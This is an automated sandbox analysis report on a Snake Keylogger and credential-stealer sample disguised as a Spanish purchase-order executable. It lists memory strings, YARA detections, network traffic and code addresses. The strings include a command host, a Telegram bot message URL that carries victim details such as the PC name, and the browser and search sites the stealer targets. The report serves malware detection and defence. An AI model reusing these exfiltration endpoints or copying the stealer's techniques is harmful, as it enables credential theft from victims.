Source: InstallUtil.exe, 00000014.00000002.2614654788.00000000029D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://smtp.zoho.eud
Source: InstallUtil.exe, 00000014.00000002.2627765188.0000000005C40000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000029E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://status.thawte.com0:
Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, xload.exe, 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000028A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002B41000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: InstallUtil.exe, 00000014.00000002.2627765188.0000000005C40000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000029E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, xload.exe, 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:701188%0D%0ADate%20a
Source: InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: InstallUtil.exe, 00000014.00000002.2614654788.0000000002A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: InstallUtil.exe, 00000014.00000002.2614654788.0000000002A4C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enT
Source: InstallUtil.exe, 00000014.00000002.2614654788.0000000002A56000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.000000000295A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, xload.exe, 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002BFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
Source: InstallUtil.exe, 00000014.00000002.2614654788.0000000002980000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.0000000002914000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.000000000295A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CF5000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C9E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C90000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002C40000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
Source: InstallUtil.exe, 00000016.00000002.2614850427.0000000002CB9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org0
Source: InstallUtil.exe, 00000014.00000002.2610458525.0000000000A7C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2627765188.0000000005C40000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000029E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: cmd.exe, 00000009.00000003.1768209106.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe, xload.exe.9.dr	String found in binary or memory: https://www.getpaint.net/
Source: InstallUtil.exe, 00000014.00000002.2622090959.00000000038C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: InstallUtil.exe, 00000014.00000002.2614654788.0000000002A8C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.00000000029A3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000014.00000002.2614654788.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: InstallUtil.exe, 00000014.00000002.2614654788.0000000002A7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/T
Source: InstallUtil.exe, 00000014.00000002.2614654788.0000000002A87000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49753 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 22.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 22.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37b3b58.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36e9442.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36a5c82.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.36624b2.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe.37703a2.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000011.00000002.2326278811.00000000039A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000016.00000002.2609226677.0000000000409000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1534523636.0000000003770000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1534523636.000000000361E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe PID: 7556, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: xload.exe PID: 5800, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 2036, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\AppData\Roaming\xload.exe

Code function: 17_2_0705AC80 CreateProcessAsUserW,

17_2_0705AC80

Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_02148448	0_2_02148448
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_02149220	0_2_02149220
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_0214CBE8	0_2_0214CBE8
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_0214B028	0_2_0214B028
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_06B3CC20	0_2_06B3CC20
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_06B37BE0	0_2_06B37BE0
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_06B741D8	0_2_06B741D8
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_075245E8	0_2_075245E8
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_0752E510	0_2_0752E510
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_075245D8	0_2_075245D8
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_078F45B8	0_2_078F45B8
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_078F0040	0_2_078F0040
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_078FF397	0_2_078FF397
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_078FF3A8	0_2_078FF3A8
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_078FBA28	0_2_078FBA28
Source: C:\Users\user\Desktop\CONSULTA#9978-PO24 ORDEN DE COMPRA DE MATERIALES DE MUESTRA_SK.exe	Code function: 0_2_06B741BF	0_2_06B741BF
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_00DC8448	17_2_00DC8448
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_00DC9220	17_2_00DC9220
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_00DCB028	17_2_00DCB028
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_05DE45E8	17_2_05DE45E8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_05DE45D8	17_2_05DE45D8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_05DE4598	17_2_05DE4598
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_05DEE510	17_2_05DEE510
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_05DF45B8	17_2_05DF45B8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_05DF0040	17_2_05DF0040
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_05DFF397	17_2_05DFF397
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_05DFF3A8	17_2_05DFF3A8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_0705B360	17_2_0705B360
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07053E00	17_2_07053E00
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07055568	17_2_07055568
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07055C11	17_2_07055C11
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07058830	17_2_07058830
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07054721	17_2_07054721
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07054730	17_2_07054730
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070503A0	17_2_070503A0
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070503B0	17_2_070503B0
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07050A0A	17_2_07050A0A
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07050A18	17_2_07050A18
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07058E80	17_2_07058E80
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07051505	17_2_07051505
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07057912	17_2_07057912
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07057918	17_2_07057918
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07055558	17_2_07055558
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07051560	17_2_07051560
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07054D98	17_2_07054D98
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070595B0	17_2_070595B0
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_0705F5C8	17_2_0705F5C8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070505D8	17_2_070505D8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070505E8	17_2_070505E8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07053DF1	17_2_07053DF1
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07050006	17_2_07050006
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_07050040	17_2_07050040
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070540A0	17_2_070540A0
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070641D8	17_2_070641D8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_0706FCA2	17_2_0706FCA2
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_0706FAA0	17_2_0706FAA0
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_0706FCB0	17_2_0706FCB0
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070FDB1A	17_2_070FDB1A
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070FAE09	17_2_070FAE09
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070FCA18	17_2_070FCA18
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070FEA20	17_2_070FEA20
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070FD140	17_2_070FD140
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070F2E7A	17_2_070F2E7A
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070F2E78	17_2_070F2E78
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070FBDD8	17_2_070FBDD8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070FC9FB	17_2_070FC9FB
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070FF8C8	17_2_070FF8C8
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_072D0448	17_2_072D0448
Source: C:\Users\user\AppData\Roaming\xload.exe	Code function: 17_2_070641BF	17_2_070641BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CAC147	20_2_00CAC147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CAD278	20_2_00CAD278
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CA5370	20_2_00CA5370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CAC468	20_2_00CAC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 20_2_00CAC738	20_2_00CAC738
